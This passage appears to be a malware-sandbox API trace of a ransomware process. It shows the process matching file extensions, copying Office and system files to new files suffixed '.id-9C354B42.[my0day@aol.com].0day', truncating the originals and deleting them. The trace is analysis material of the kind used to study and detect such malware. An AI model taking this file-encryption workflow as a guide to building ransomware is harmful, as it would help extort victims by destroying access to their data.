lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.992] lstrlenW (lpString=".dbf") returned 4 [0274.992] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.992] lstrlenW (lpString=".1cd") returned 4 [0274.992] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.992] lstrlenW (lpString=".jpg") returned 4 [0274.992] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.992] lstrlenW (lpString=".doc") returned 4 [0274.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString=".docx") returned 5 [0274.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.992] lstrlenW (lpString=".pdf") returned 4 [0274.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString=".xls") returned 4 [0274.992] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.992] lstrlenW (lpString=".xlsx") returned 5 [0274.992] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.992] lstrlenW (lpString=".ppt") returned 4 [0274.992] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.992] lstrlenW (lpString=".zip") returned 4 [0274.992] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.992] lstrlenW (lpString=".rar") returned 4 [0274.992] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString=".bz2") returned 4 [0274.992] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString=".7z") returned 3 [0274.992] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.993] lstrlenW (lpString=".dbf") returned 4 [0274.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.993] lstrlenW (lpString=".1cd") returned 4 [0274.993] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.993] lstrlenW (lpString=".jpg") returned 4 [0274.993] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.993] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.993] lstrlenW (lpString="DD01761_.WMF") returned 12 [0274.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.993] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=4148) returned 1 [0274.993] CloseHandle (hObject=0x384) returned 1 [0274.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf")) returned 0x20 [0274.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.994] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.994] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.994] GetLastError () returned 0x0 [0274.994] ReadFile (in: hFile=0x384, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x1034, lpOverlapped=0x0) returned 1 [0275.027] WriteFile (in: hFile=0x39c, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x1040, lpOverlapped=0x0) returned 1 [0275.028] ReadFile (in: hFile=0x384, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0275.028] WriteFile (in: hFile=0x39c, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0275.028] SetEndOfFile (hFile=0x39c) returned 1 [0275.028] CloseHandle (hObject=0x39c) returned 1 [0275.028] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0275.028] SetEndOfFile (hFile=0x384) returned 1 [0275.031] CloseHandle (hObject=0x384) returned 1 [0275.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0275.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf")) returned 1 [0275.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.046] lstrlenW (lpString=".doc") returned 4 [0275.046] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.046] lstrlenW (lpString=".docx") returned 5 [0275.046] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.046] lstrlenW (lpString=".pdf") returned 4 [0275.046] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.046] lstrlenW (lpString=".xls") returned 4 [0275.046] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.046] lstrlenW (lpString=".xlsx") returned 5 [0275.046] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.046] lstrlenW (lpString=".ppt") returned 4 [0275.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.047] lstrlenW (lpString=".zip") returned 4 [0275.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.047] lstrlenW (lpString=".rar") returned 4 [0275.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString=".bz2") returned 4 [0275.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString=".7z") returned 3 [0275.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.047] lstrlenW (lpString=".dbf") returned 4 [0275.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.047] lstrlenW (lpString=".1cd") returned 4 [0275.047] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.047] lstrlenW (lpString=".jpg") returned 4 [0275.047] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.047] lstrlenW (lpString=".doc") returned 4 [0275.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString=".docx") returned 5 [0275.047] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.047] lstrlenW (lpString=".pdf") returned 4 [0275.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.047] lstrlenW (lpString=".xls") returned 4 [0275.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.047] lstrlenW (lpString=".xlsx") returned 5 [0275.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.047] lstrlenW (lpString=".ppt") returned 4 [0275.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.048] lstrlenW (lpString=".zip") returned 4 [0275.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.048] lstrlenW (lpString=".rar") returned 4 [0275.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.048] lstrlenW (lpString=".bz2") returned 4 [0275.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.048] lstrlenW (lpString=".7z") returned 3 [0275.048] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.048] lstrlenW (lpString=".dbf") returned 4 [0275.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.048] lstrlenW (lpString=".1cd") returned 4 [0275.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0275.048] lstrlenW (lpString=".jpg") returned 4 [0275.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.048] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0275.048] lstrlenW (lpString="ED00010_.WMF") returned 12 [0275.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0275.049] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=1382) returned 1 [0275.049] CloseHandle (hObject=0x2c4) returned 1 [0275.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 0x20 [0275.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0275.049] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0275.049] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0275.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0275.050] GetLastError () returned 0x0 [0275.050] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x566, lpOverlapped=0x0) returned 1 [0275.063] WriteFile (in: hFile=0x37c, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x570, lpOverlapped=0x0) returned 1 [0275.065] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0275.065] WriteFile (in: hFile=0x37c, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0275.065] SetEndOfFile (hFile=0x37c) returned 1 [0275.065] CloseHandle (hObject=0x37c) returned 1 [0275.065] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0275.065] SetEndOfFile (hFile=0x2c4) returned 1 [0275.067] CloseHandle (hObject=0x2c4) returned 1 [0275.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0275.067] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 1 [0275.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.067] lstrlenW (lpString=".doc") returned 4 [0275.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString=".docx") returned 5 [0275.068] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.068] lstrlenW (lpString=".pdf") returned 4 [0275.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString=".xls") returned 4 [0275.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.068] lstrlenW (lpString=".xlsx") returned 5 [0275.068] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.068] lstrlenW (lpString=".ppt") returned 4 [0275.068] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.068] lstrlenW (lpString=".zip") returned 4 [0275.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.068] lstrlenW (lpString=".rar") returned 4 [0275.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString=".bz2") returned 4 [0275.068] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString=".7z") returned 3 [0275.068] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.068] lstrlenW (lpString=".dbf") returned 4 [0275.068] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.068] lstrlenW (lpString=".1cd") returned 4 [0275.068] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.068] lstrlenW (lpString=".jpg") returned 4 [0275.068] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.068] lstrlenW (lpString=".doc") returned 4 [0275.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.068] lstrlenW (lpString=".docx") returned 5 [0275.068] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.069] lstrlenW (lpString=".pdf") returned 4 [0275.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.069] lstrlenW (lpString=".xls") returned 4 [0275.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.069] lstrlenW (lpString=".xlsx") returned 5 [0275.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.069] lstrlenW (lpString=".ppt") returned 4 [0275.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.069] lstrlenW (lpString=".zip") returned 4 [0275.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.069] lstrlenW (lpString=".rar") returned 4 [0275.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.069] lstrlenW (lpString=".bz2") returned 4 [0275.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.069] lstrlenW (lpString=".7z") returned 3 [0275.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.069] lstrlenW (lpString=".dbf") returned 4 [0275.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.069] lstrlenW (lpString=".1cd") returned 4 [0275.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0275.069] lstrlenW (lpString=".jpg") returned 4 [0275.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.069] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0275.069] lstrlenW (lpString="ED00172_.WMF") returned 12 [0275.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 59 os_tid = 0x68c [0265.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x588598 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x34c0048 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5334d0 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521b50 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5334e8 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x35c0020 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533500 [0265.261] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533500, Size=0x20) returned 0x587a30 [0265.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533500 [0265.261] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533500, Size=0x20) returned 0x587a58 [0265.261] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.262] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.262] Wow64DisableWow64FsRedirection (in: OldValue=0x2e6ff58 | out: OldValue=0x2e6ff58*=0x0) returned 1 [0265.262] lstrlenW (lpString="kernel32.dll") returned 12 [0265.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587a30 | out: hHeap=0x4a0000) returned 1 [0265.262] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587a58 | out: hHeap=0x4a0000) returned 1 [0265.262] Sleep (dwMilliseconds=0x64) [0265.410] Sleep (dwMilliseconds=0x64) [0265.565] Sleep (dwMilliseconds=0x64) [0265.779] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0265.779] lstrlenW (lpString="Alphabet.xml") returned 12 [0265.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0265.848] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=791686) returned 1 [0265.848] CloseHandle (hObject=0x304) returned 1 [0265.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0265.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.848] lstrlenW (lpString=".doc") returned 4 [0265.848] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0265.848] lstrlenW (lpString=".docx") returned 5 [0265.849] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0265.849] lstrlenW (lpString=".pdf") returned 4 [0265.849] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString=".xls") returned 4 [0265.849] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString=".xlsx") returned 5 [0265.849] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0265.849] lstrlenW (lpString=".ppt") returned 4 [0265.849] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.849] lstrlenW (lpString=".zip") returned 4 [0265.849] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0265.849] lstrlenW (lpString=".rar") returned 4 [0265.849] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString=".bz2") returned 4 [0265.849] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString=".7z") returned 3 [0265.849] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0265.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.849] lstrlenW (lpString=".dbf") returned 4 [0265.849] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.849] lstrlenW (lpString=".1cd") returned 4 [0265.849] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.849] lstrlenW (lpString=".jpg") returned 4 [0265.849] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.849] lstrlenW (lpString=".doc") returned 4 [0265.849] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0265.849] lstrlenW (lpString=".docx") returned 5 [0265.849] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0265.849] lstrlenW (lpString=".pdf") returned 4 [0265.849] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0265.849] 